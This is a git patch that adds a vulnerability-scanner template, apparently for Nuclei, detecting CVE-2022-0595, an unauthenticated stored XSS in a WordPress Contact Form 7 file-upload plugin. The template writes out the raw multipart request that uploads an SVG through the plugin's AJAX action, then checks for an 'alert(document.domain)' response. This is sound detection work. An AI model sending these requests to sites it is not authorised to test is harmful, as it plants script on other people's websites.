From 0a27decfe65d5d0754cb097cf9dede40eb2bb227 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 24 Apr 2022 13:53:15 +0400 Subject: [PATCH] Create CVE-2022-0595.yaml (#4213) * Create CVE-2022-0595.yaml * Update CVE-2022-0595.yaml * Update CVE-2022-0595.yaml * misc updates Co-authored-by: Sandeep Singh --- cves/2022/CVE-2022-0595.yaml | 48 ++++++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 cves/2022/CVE-2022-0595.yaml diff --git a/cves/2022/CVE-2022-0595.yaml b/cves/2022/CVE-2022-0595.yaml new file mode 100644 index 0000000000..838b6ceb01 --- /dev/null +++ b/cves/2022/CVE-2022-0595.yaml @@ -0,0 +1,48 @@ +id: CVE-2022-0595 + +info: + name: Drag and Drop Multiple File Upload - Contact Form 7 < 1.3.6.3 - Unauthenticated Stored XSS + author: akincibor + severity: high + description: The plugin allows SVG files to be uploaded by default via the dnd_codedropz_upload AJAX action, which could lead to Stored Cross-Site Scripting issue. + reference: + - https://wpscan.com/vulnerability/1b849957-eaca-47ea-8f84-23a3a98cc8de + tags: cve,cve2022,xss,wordpress,wp-plugin + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161 + + -----------------------------92633278134516118923780781161 + Content-Disposition: form-data; name="size_limit" + + 10485760 + -----------------------------92633278134516118923780781161 + Content-Disposition: form-data; name="action" + + dnd_codedropz_upload + -----------------------------92633278134516118923780781161 + Content-Disposition: form-data; name="type" + + click + -----------------------------92633278134516118923780781161 + Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.svg" + Content-Type: image/jpeg + + + -----------------------------92633278134516118923780781161-- + + - | + GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "alert(document.domain)")' + - 'status_code_2 == 200' + condition: and